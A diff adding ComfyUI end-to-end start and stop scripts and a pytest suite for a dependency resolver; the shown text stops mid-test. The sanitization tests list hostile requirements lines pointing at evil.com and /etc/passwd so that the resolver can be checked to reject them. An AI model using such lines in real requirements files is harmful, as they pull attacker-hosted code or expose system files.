+COMFY_DIR="$E2E_ROOT/comfyui"
+LOG_DIR="$E2E_ROOT/logs"
+LOG_FILE="$LOG_DIR/comfyui.log"
+PID_FILE="$LOG_DIR/comfyui.pid"
+
+mkdir -p "$LOG_DIR"
+
+# --- Check/clear port ---
+if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ log "Port $PORT is in use. Attempting to stop existing process..."
+ # Try to read existing PID file
+ if [[ -f "$PID_FILE" ]]; then
+ OLD_PID="$(cat "$PID_FILE")"
+ if kill -0 "$OLD_PID" 2>/dev/null; then
+ kill "$OLD_PID" 2>/dev/null || true
+ sleep 2
+ fi
+ fi
+ # Fallback: kill by port pattern
+ if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
+ sleep 2
+ fi
+ # Final check
+ if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ die "Port $PORT is still in use after cleanup attempt"
+ fi
+ log "Port $PORT cleared."
+fi
+
+# --- Start ComfyUI ---
+log "Starting ComfyUI on port $PORT..."
+
+# Create empty log file (ensures tail -f works from the start)
+: > "$LOG_FILE"
+
+# Launch with unbuffered Python output so log lines appear immediately
+PYTHONUNBUFFERED=1 \
+HOME="$E2E_ROOT/home" \
+ nohup "$PY" "$COMFY_DIR/main.py" \
+ --cpu \
+ --enable-manager \
+ --port "$PORT" \
+ > "$LOG_FILE" 2>&1 &
+COMFYUI_PID=$!
+
+echo "$COMFYUI_PID" > "$PID_FILE"
+log "ComfyUI PID=$COMFYUI_PID, log=$LOG_FILE"
+
+# Verify process didn't crash immediately
+sleep 1
+if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ err "ComfyUI process died immediately. Last 30 lines of log:"
+ tail -n 30 "$LOG_FILE" >&2
+ rm -f "$PID_FILE"
+ exit 1
+fi
+
+# --- Block until ready ---
+# tail -n +1 -f: read from file start AND follow new content (no race condition)
+# grep -q -m1: exit on first match → tail gets SIGPIPE → pipeline ends
+# timeout: kill the pipeline after TIMEOUT seconds
+log "Waiting up to ${TIMEOUT}s for ComfyUI to become ready..."
+
+if timeout "$TIMEOUT" bash -c \
+ "tail -n +1 -f '$LOG_FILE' 2>/dev/null | grep -q -m1 'To see the GUI'"; then
+ log "ComfyUI startup message detected."
+else
+ err "Timeout (${TIMEOUT}s) waiting for ComfyUI. Last 30 lines of log:"
+ tail -n 30 "$LOG_FILE" >&2
+ kill "$COMFYUI_PID" 2>/dev/null || true
+ rm -f "$PID_FILE"
+ exit 1
+fi
+
+# Verify process is still alive after readiness detected
+if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ err "ComfyUI process died after readiness signal. Last 30 lines:"
+ tail -n 30 "$LOG_FILE" >&2
+ rm -f "$PID_FILE"
+ exit 1
+fi
+
+# Optional HTTP health check
+if command -v curl >/dev/null 2>&1; then
+ if curl -sf "http://127.0.0.1:${PORT}/system_stats" >/dev/null 2>&1; then
+ log "HTTP health check passed (/system_stats)"
+ else
+ log "HTTP health check skipped (endpoint not yet available, but startup message detected)"
+ fi
+fi
+
+log "ComfyUI is ready."
+echo "COMFYUI_PID=$COMFYUI_PID PORT=$PORT"
diff --git a/tests/e2e/scripts/stop_comfyui.sh b/tests/e2e/scripts/stop_comfyui.sh
new file mode 100755
index 00000000..d110c44c
--- /dev/null
+++ b/tests/e2e/scripts/stop_comfyui.sh
@@ -0,0 +1,75 @@
+#!/usr/bin/env bash
+# stop_comfyui.sh — Graceful ComfyUI shutdown for E2E tests
+#
+# Stops a ComfyUI process previously started by start_comfyui.sh.
+# Uses SIGTERM first, then SIGKILL after a grace period.
+#
+# Input env vars:
+# E2E_ROOT — (required) path to E2E environment
+# PORT — ComfyUI port for fallback pkill (default: 8199)
+#
+# Exit: 0=stopped, 1=failed
+
+set -euo pipefail
+
+PORT="${PORT:-8199}"
+GRACE_PERIOD=10
+
+# --- Logging helpers ---
+log() { echo "[stop_comfyui] $*"; }
+err() { echo "[stop_comfyui] ERROR: $*" >&2; }
+die() { err "$@"; exit 1; }
+
+# --- Validate ---
+[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
+
+PID_FILE="$E2E_ROOT/logs/comfyui.pid"
+
+# --- Read PID ---
+COMFYUI_PID=""
+if [[ -f "$PID_FILE" ]]; then
+ COMFYUI_PID="$(cat "$PID_FILE")"
+ log "Read PID=$COMFYUI_PID from $PID_FILE"
+fi
+
+# --- Graceful shutdown via SIGTERM ---
+if [[ -n "$COMFYUI_PID" ]] && kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ log "Sending SIGTERM to PID $COMFYUI_PID..."
+ kill "$COMFYUI_PID" 2>/dev/null || true
+
+ # Wait for graceful shutdown
+ elapsed=0
+ while kill -0 "$COMFYUI_PID" 2>/dev/null && [[ "$elapsed" -lt "$GRACE_PERIOD" ]]; do
+ sleep 1
+ elapsed=$((elapsed + 1))
+ done
+
+ # Force kill if still alive
+ if kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ log "Process still alive after ${GRACE_PERIOD}s. Sending SIGKILL..."
+ kill -9 "$COMFYUI_PID" 2>/dev/null || true
+ sleep 1
+ fi
+fi
+
+# --- Fallback: kill by port pattern ---
+if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ log "Port $PORT still in use. Attempting pkill fallback..."
+ pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
+ sleep 2
+
+ if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ pkill -9 -f "main\\.py.*--port $PORT" 2>/dev/null || true
+ sleep 1
+ fi
+fi
+
+# --- Cleanup PID file ---
+rm -f "$PID_FILE"
+
+# --- Verify port is free ---
+if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ die "Port $PORT is still in use after shutdown"
+fi
+
+log "ComfyUI stopped."
diff --git a/tests/test_unified_dep_resolver.py b/tests/test_unified_dep_resolver.py
new file mode 100644
index 00000000..bcbaf36d
--- /dev/null
+++ b/tests/test_unified_dep_resolver.py
@@ -0,0 +1,1235 @@
+"""Tests for comfyui_manager.common.unified_dep_resolver."""
+
+from __future__ import annotations
+
+import importlib
+import importlib.util
+import os
+import shutil
+import subprocess
+import sys
+import tempfile
+import time
+import types
+from unittest import mock
+
+import pytest
+
+# ---------------------------------------------------------------------------
+# Import the module under test by loading it directly, replacing the
+# ``from . import manager_util`` relative import with a fake module.
+# This avoids needing the full ComfyUI runtime.
+# ---------------------------------------------------------------------------
+
+_MOCK_INSTALLED_PACKAGES: dict[str, str] = {}
+
+
+class _FakeStrictVersion:
+ """Minimal replica of manager_util.StrictVersion for testing."""
+
+ def __init__(self, version_string: str) -> None:
+ parts = version_string.split('.')
+ self.major = int(parts[0])
+ self.minor = int(parts[1]) if len(parts) > 1 else 0
+ self.patch = int(parts[2]) if len(parts) > 2 else 0
+
+ def __ge__(self, other: _FakeStrictVersion) -> bool:
+ return (self.major, self.minor, self.patch) >= (other.major, other.minor, other.patch)
+
+ def __eq__(self, other: object) -> bool:
+ if not isinstance(other, _FakeStrictVersion):
+ return NotImplemented
+ return (self.major, self.minor, self.patch) == (other.major, other.minor, other.patch)
+
+ def __lt__(self, other: _FakeStrictVersion) -> bool:
+ return (self.major, self.minor, self.patch) < (other.major, other.minor, other.patch)
+
+
+def _fake_get_installed_packages(renew: bool = False) -> dict[str, str]:
+ return _MOCK_INSTALLED_PACKAGES
+
+
+def _fake_robust_readlines(path: str) -> list[str]:
+ with open(path, "r", encoding="utf-8") as f:
+ return f.readlines()
+
+
+# Build a fake manager_util module
+_manager_util_fake = types.ModuleType("comfyui_manager.common.manager_util")
+_manager_util_fake.StrictVersion = _FakeStrictVersion
+_manager_util_fake.get_installed_packages = _fake_get_installed_packages
+_manager_util_fake.robust_readlines = _fake_robust_readlines
+
+# Ensure parent packages exist in sys.modules
+if "comfyui_manager" not in sys.modules:
+ sys.modules["comfyui_manager"] = types.ModuleType("comfyui_manager")
+if "comfyui_manager.common" not in sys.modules:
+ _common_mod = types.ModuleType("comfyui_manager.common")
+ sys.modules["comfyui_manager.common"] = _common_mod
+ sys.modules["comfyui_manager"].common = _common_mod # type: ignore[attr-defined]
+
+# Inject the fake manager_util
+sys.modules["comfyui_manager.common.manager_util"] = _manager_util_fake
+sys.modules["comfyui_manager.common"].manager_util = _manager_util_fake # type: ignore[attr-defined]
+
+# Now load the module under test via spec
+_MODULE_PATH = os.path.join(
+ os.path.dirname(__file__), os.pardir,
+ "comfyui_manager", "common", "unified_dep_resolver.py",
+)
+_spec = importlib.util.spec_from_file_location(
+ "comfyui_manager.common.unified_dep_resolver",
+ os.path.abspath(_MODULE_PATH),
+)
+assert _spec is not None and _spec.loader is not None
+_udr_module = importlib.util.module_from_spec(_spec)
+sys.modules[_spec.name] = _udr_module
+_spec.loader.exec_module(_udr_module)
+
+# Pull symbols into the test namespace
+CollectedDeps = _udr_module.CollectedDeps
+InstallResult = _udr_module.InstallResult
+LockfileResult = _udr_module.LockfileResult
+PackageRequirement = _udr_module.PackageRequirement
+ResolveResult = _udr_module.ResolveResult
+UnifiedDepResolver = _udr_module.UnifiedDepResolver
+UvNotAvailableError = _udr_module.UvNotAvailableError
+collect_base_requirements = _udr_module.collect_base_requirements
+collect_node_pack_paths = _udr_module.collect_node_pack_paths
+_CREDENTIAL_PATTERN = _udr_module._CREDENTIAL_PATTERN
+_DANGEROUS_PATTERNS = _udr_module._DANGEROUS_PATTERNS
+_INLINE_DANGEROUS_OPTIONS = _udr_module._INLINE_DANGEROUS_OPTIONS
+_TMP_PREFIX = _udr_module._TMP_PREFIX
+_VERSION_SPEC_PATTERN = _udr_module._VERSION_SPEC_PATTERN
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+def _make_node_pack(tmp: str, name: str, requirements: str | None = None) -> str:
+ """Create a fake node pack directory with optional requirements.txt."""
+ path = os.path.join(tmp, name)
+ os.makedirs(path, exist_ok=True)
+ if requirements is not None:
+ with open(os.path.join(path, "requirements.txt"), "w") as f:
+ f.write(requirements)
+ return path
+
+
+def _resolver(
+ paths: list[str],
+ blacklist: set[str] | None = None,
+ overrides: dict[str, str] | None = None,
+ downgrade_blacklist: list[str] | None = None,
+) -> UnifiedDepResolver:
+ return UnifiedDepResolver(
+ node_pack_paths=paths,
+ blacklist=blacklist or set(),
+ overrides=overrides or {},
+ downgrade_blacklist=downgrade_blacklist or [],
+ )
+
+
+# ===========================================================================
+# Data class instantiation
+# ===========================================================================
+
+class TestDataClasses:
+ def test_package_requirement(self):
+ pr = PackageRequirement(name="torch", spec="torch>=2.0", source="/packs/a")
+ assert pr.name == "torch"
+ assert pr.spec == "torch>=2.0"
+
+ def test_collected_deps_defaults(self):
+ cd = CollectedDeps()
+ assert cd.requirements == []
+ assert cd.skipped == []
+ assert cd.sources == {}
+ assert cd.extra_index_urls == []
+
+ def test_lockfile_result(self):
+ lr = LockfileResult(success=True, lockfile_path="/tmp/x.txt")
+ assert lr.success
+ assert lr.conflicts == []
+
+ def test_install_result(self):
+ ir = InstallResult(success=False, stderr="boom")
+ assert not ir.success
+ assert ir.installed == []
+
+ def test_resolve_result(self):
+ rr = ResolveResult(success=True)
+ assert rr.collected is None
+ assert rr.error is None
+
+
+# ===========================================================================
+# collect_requirements
+# ===========================================================================
+
+class TestCollectRequirements:
+ def test_normal_parsing(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\nrequests\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 2
+ names = {req.name for req in deps.requirements}
+ assert "numpy" in names
+ assert "requests" in names
+
+ def test_empty_requirements(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_no_requirements_file(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a") # No requirements.txt
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_comment_and_blank_handling(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "# comment\n\nnumpy\n \n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ def test_inline_comment_stripping(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.0 # pin version\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements[0].spec == "numpy>=1.0"
+
+ def test_blacklist_filtering(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "torch\nnumpy\ntorchaudio\n")
+ r = _resolver([p], blacklist={"torch", "torchaudio"})
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert len(deps.skipped) == 2
+
+ def test_remap_application(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "old-package\n")
+ r = _resolver([p], overrides={"old-package": "new-package>=1.0"})
+ deps = r.collect_requirements()
+ assert deps.requirements[0].spec == "new-package>=1.0"
+
+ def test_disabled_path_new_style(self, tmp_path):
+ disabled_dir = os.path.join(str(tmp_path), ".disabled")
+ p = _make_node_pack(disabled_dir, "pack_a", "numpy\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_disabled_path_old_style(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a.disabled", "numpy\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_duplicate_specs_kept(self, tmp_path):
+ p1 = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
+ p2 = _make_node_pack(str(tmp_path), "pack_b", "numpy>=1.22\n")
+ r = _resolver([p1, p2])
+ deps = r.collect_requirements()
+ numpy_reqs = [req for req in deps.requirements if req.name == "numpy"]
+ assert len(numpy_reqs) == 2 # Both specs preserved
+
+ def test_sources_tracking(self, tmp_path):
+ p1 = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
+ p2 = _make_node_pack(str(tmp_path), "pack_b", "numpy\n")
+ r = _resolver([p1, p2])
+ deps = r.collect_requirements()
+ assert len(deps.sources["numpy"]) == 2
+
+
+# ===========================================================================
+# Input sanitization
+# ===========================================================================
+
+class TestInputSanitization:
+ @pytest.mark.parametrize("line", [
+ "-r ../../../etc/hosts",
+ "--requirement secret.txt",
+ "-e git+https://evil.com/repo",
+ "--editable ./local",
+ "-c constraint.txt",
+ "--constraint external.txt",
+ "--find-links http://evil.com/pkgs",
+ "-f http://evil.com/pkgs",
+ "evil_pkg @ file:///etc/passwd",
+ ])
+ def test_dangerous_patterns_rejected(self, line, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", line + "\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+ assert len(deps.skipped) == 1
+ assert "rejected" in deps.skipped[0][1]
+
+ def test_path_separator_rejected(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "../evil/pkg\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+ assert "path separator" in deps.skipped[0][1]
+
+ def test_backslash_rejected(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "evil\\pkg\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_valid_spec_with_version(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ def test_environment_marker_allowed(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ 'pywin32>=300; sys_platform=="win32"\n')
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ @pytest.mark.parametrize("line", [
+ "torch --find-links localdir",
+ "numpy --constraint evil.txt",
+ "scipy --requirement secret.txt",
+ "pkg --editable ./local",
+ "torch -f localdir",
+ "numpy -c evil.txt",
+ "pkg -r secret.txt",
+ "scipy -e ./local",
+ # Concatenated short flags (no space between flag and value)
+ "torch -fhttps://evil.com/packages",
+ "numpy -cevil.txt",
+ "pkg -rsecret.txt",
+ "scipy -e./local",
+ # Case-insensitive
+ "torch --FIND-LINKS localdir",
+ "numpy --Constraint evil.txt",
+ # Additional dangerous options
+ "torch --trusted-host evil.com",
+ "numpy --global-option=--no-user-cfg",
+ "pkg --install-option=--prefix=/tmp",
+ ])
+ def test_inline_dangerous_options_rejected(self, line, tmp_path):
+ """Pip options after package name must be caught (not just at line start)."""
+ p = _make_node_pack(str(tmp_path), "pack_a", line + "\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == [], f"'{line}' should have been rejected"
+ assert len(deps.skipped) == 1
+ assert "rejected" in deps.skipped[0][1]
+
+ def test_index_url_not_blocked_by_inline_check(self, tmp_path):
+ """--index-url and --extra-index-url are legitimate and extracted before inline check."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --extra-index-url https://download.pytorch.org/whl/cu121\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert len(deps.extra_index_urls) == 1
+
+ def test_combined_index_url_and_dangerous_option(self, tmp_path):
+ """A line with both --extra-index-url and --find-links must reject
+ AND must NOT retain the extracted index URL."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --extra-index-url https://evil.com --find-links /local\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == [], "line should have been rejected"
+ assert deps.extra_index_urls == [], "evil URL should not be retained"
+ assert len(deps.skipped) == 1
+
+ @pytest.mark.parametrize("spec", [
+ "package[extra-c]>=1.0",
+ "package[extra-r]",
+ "my-e-package>=2.0",
+ "some-f-lib",
+ "re-crypto>=1.0",
+ # Real-world packages with hyphens near short flag letters
+ "opencv-contrib-python-headless",
+ "scikit-learn>=1.0",
+ "onnxruntime-gpu",
+ "face-recognition>=1.3",
+ ])
+ def test_inline_check_no_false_positive_on_package_names(self, spec, tmp_path):
+ """Short flags inside package names or extras must not trigger false positive."""
+ p = _make_node_pack(str(tmp_path), "pack_a", spec + "\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1, f"'{spec}' was incorrectly rejected"
+
+
+# ===========================================================================
+# --index-url separation
+# ===========================================================================
+
+class TestIndexUrlSeparation:
+ def test_index_url_split(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --index-url https://download.pytorch.org/whl/cu121\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
+
+ def test_no_index_url(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.extra_index_urls == []
+
+ def test_duplicate_index_urls_deduplicated(self, tmp_path):
+ p1 = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --index-url https://example.com/whl\n")
+ p2 = _make_node_pack(str(tmp_path), "pack_b",
+ "torchvision --index-url https://example.com/whl\n")
+ r = _resolver([p1, p2], blacklist=set())
+ deps = r.collect_requirements()
+ assert len(deps.extra_index_urls) == 1
+
+ def test_standalone_index_url_line(self, tmp_path):
+ """Standalone ``--index-url URL`` line with no package prefix."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "--index-url https://download.pytorch.org/whl/cu121\nnumpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
+
+ def test_standalone_extra_index_url_line(self, tmp_path):
+ """Standalone ``--extra-index-url URL`` line must not become a package."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "--extra-index-url https://custom.pypi.org/simple\nnumpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert "https://custom.pypi.org/simple" in deps.extra_index_urls
+
+ def test_extra_index_url_with_package_prefix(self, tmp_path):
+ """``package --extra-index-url URL`` splits correctly."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --extra-index-url https://download.pytorch.org/whl/cu121\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
+
+ def test_multiple_index_urls_on_single_line(self, tmp_path):
+ """Multiple --extra-index-url / --index-url on the same line."""
+ p = _make_node_pack(
+ str(tmp_path), "pack_a",
+ "torch --extra-index-url https://url1.example.com "
+ "--index-url https://url2.example.com\n",
+ )
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert "https://url1.example.com" in deps.extra_index_urls
+ assert "https://url2.example.com" in deps.extra_index_urls
+
+ def test_bare_index_url_no_value(self, tmp_path):
+ """Bare ``--index-url`` with no URL value must not become a package."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "--index-url\nnumpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert deps.extra_index_urls == []
+
+
+# ===========================================================================
+# Downgrade blacklist
+# ===========================================================================
+
class TestDowngradeBlacklist:
    """Requirements for blacklisted packages must never downgrade an installed version."""

    def setup_method(self):
        # Start each test from a clean "nothing installed" state.
        _MOCK_INSTALLED_PACKAGES.clear()

    def teardown_method(self):
        _MOCK_INSTALLED_PACKAGES.clear()

    def test_not_in_blacklist_passes(self, tmp_path):
        _MOCK_INSTALLED_PACKAGES["numpy"] = "1.24.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy<=1.20\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        # numpy is not blacklisted, so even a downgrade request is kept.
        assert len(collected.requirements) == 1

    def test_no_version_spec_installed_blocked(self, tmp_path):
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        assert collected.requirements == []
        assert "downgrade blacklisted" in collected.skipped[0][1]

    def test_no_version_spec_not_installed_passes(self, tmp_path):
        # torch is absent from the environment, so nothing can be downgraded.
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        assert len(collected.requirements) == 1

    @pytest.mark.parametrize("operator,blocked", [
        ("<=1.20", True),   # downgrade blocked
        ("==1.20", True),   # exact match blocked (installed >= requested)
        ("<2.0", True),     # less-than blocked (installed >= requested)
        ("~=1.20", True),   # compatible release blocked
        (">=2.5", False),   # upgrade allowed
        (">2.0", False),    # greater-than allowed
        ("!=1.20", False),  # not-equal allowed
    ])
    def test_operator_handling(self, operator, blocked, tmp_path):
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", f"torch{operator}\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        if blocked:
            assert collected.requirements == [], f"Expected torch{operator} to be blocked"
        else:
            assert len(collected.requirements) == 1, f"Expected torch{operator} to pass"

    def test_same_version_blocked(self, tmp_path):
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch==2.1.0\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        assert collected.requirements == []  # installed >= requested → blocked

    def test_higher_version_request_passes_eq(self, tmp_path):
        _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch==2.5.0\n")
        collected = _resolver([pack], downgrade_blacklist=["torch"]).collect_requirements()
        assert len(collected.requirements) == 1  # installed < requested → allowed
+
+
+# ===========================================================================
+# _get_uv_cmd
+# ===========================================================================
+
class TestGetUvCmd:
    """Discovery of the uv executable: module form, standalone binary, or absent."""

    def test_module_uv(self):
        """When ``python -m uv`` responds, the module invocation is preferred."""
        r = _resolver([])
        with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
            cmd = r._get_uv_cmd()
        assert cmd[-2:] == ["-m", "uv"]

    def test_standalone_uv(self):
        """Fall back to a standalone ``uv`` binary found on PATH."""
        r = _resolver([])
        with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
            with mock.patch("shutil.which", return_value="/usr/bin/uv"):
                cmd = r._get_uv_cmd()
        assert cmd == ["uv"]

    def test_uv_not_available(self):
        """Neither the module nor a binary is available → UvNotAvailableError."""
        r = _resolver([])
        with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
            with mock.patch("shutil.which", return_value=None):
                with pytest.raises(UvNotAvailableError):
                    r._get_uv_cmd()

    def test_embedded_python_uses_s_flag(self):
        """An embedded python interpreter must pass ``-s``."""
        r = _resolver([])
        # Fix: dropped the previous mock.patch.object(type(r), '_get_uv_cmd',
        # wraps=r._get_uv_cmd) wrapper — it merely re-dispatched every call to
        # the real method (a no-op) and obscured the code path under test.
        with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
            with mock.patch(
                "comfyui_manager.common.unified_dep_resolver.sys"
            ) as mock_sys:
                # NOTE(review): assumes the resolver detects embedded python by
                # inspecting sys.executable for "python_embeded" — confirm.
                mock_sys.executable = "/path/python_embeded/python.exe"
                cmd = r._get_uv_cmd()
        assert "-s" in cmd
+
+
+# ===========================================================================
+# compile_lockfile
+# ===========================================================================
+
class TestCompileLockfile:
    """compile_lockfile behaviour with ``subprocess.run`` mocked out.

    A stand-in for uv writes the lockfile that the real ``uv pip compile``
    would produce; failure modes are simulated via return codes / exceptions.
    """

    @staticmethod
    def _fake_uv_run(lockfile_content, captured_cmd=None):
        """Build a ``subprocess.run`` replacement that writes *lockfile_content*
        to the path following ``--output-file`` and, when *captured_cmd* is
        given, records the full command line into it."""
        def fake_run(cmd, **kwargs):
            if captured_cmd is not None:
                captured_cmd.extend(cmd)
            for i, arg in enumerate(cmd):
                if arg == "--output-file" and i + 1 < len(cmd):
                    with open(cmd[i + 1], "w") as f:
                        f.write(lockfile_content)
            return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
        return fake_run

    @staticmethod
    def _cleanup(result):
        """Best-effort removal of the temp dir holding the produced lockfile."""
        if getattr(result, "lockfile_path", None):
            shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)

    def test_success(self, tmp_path):
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
        )
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run",
                            side_effect=self._fake_uv_run("numpy==1.24.0\n")):
                result = r.compile_lockfile(deps)
        try:
            assert result.success
            assert result.lockfile_path is not None
        finally:
            # Fix: clean up even when an assertion fails so failing test runs
            # do not leak temp directories.
            self._cleanup(result)

    def test_conflict_detection(self):
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
        )
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
                [], 1, stdout="", stderr="error: conflict between numpy and scipy"
            )):
                result = r.compile_lockfile(deps)
        assert not result.success
        assert len(result.conflicts) > 0

    def test_timeout(self):
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
        )
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("uv", 300)):
                result = r.compile_lockfile(deps)
        assert not result.success
        assert "timeout" in result.conflicts[0].lower()

    def test_lockfile_not_created(self):
        # uv exits 0 but never writes the output file — must be reported.
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
        )
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
                [], 0, stdout="", stderr=""
            )):
                result = r.compile_lockfile(deps)
        assert not result.success
        assert "lockfile not created" in result.conflicts[0]

    def test_extra_index_urls_passed(self, tmp_path):
        r = _resolver([])
        deps = CollectedDeps(
            requirements=[PackageRequirement("torch", "torch", "/pack/a")],
            extra_index_urls=["https://download.pytorch.org/whl/cu121"],
        )
        captured_cmd: list[str] = []
        with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
            with mock.patch("subprocess.run",
                            side_effect=self._fake_uv_run("torch==2.1.0\n", captured_cmd)):
                result = r.compile_lockfile(deps)
        try:
            assert result.success
            assert "--extra-index-url" in captured_cmd
            assert "https://download.pytorch.org/whl/cu121" in captured_cmd
        finally:
            self._cleanup(result)

    def test_constraints_file_created(self, tmp_path):
        # Base requirements should reach uv through a --constraint file.
        r = UnifiedDepResolver(
            node_pack_paths=[],
            base_requirements=["comfyui-core>=1.0"],
        )
        deps = CollectedDeps(
            requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
        )
        captured_cmd: list[str] = []
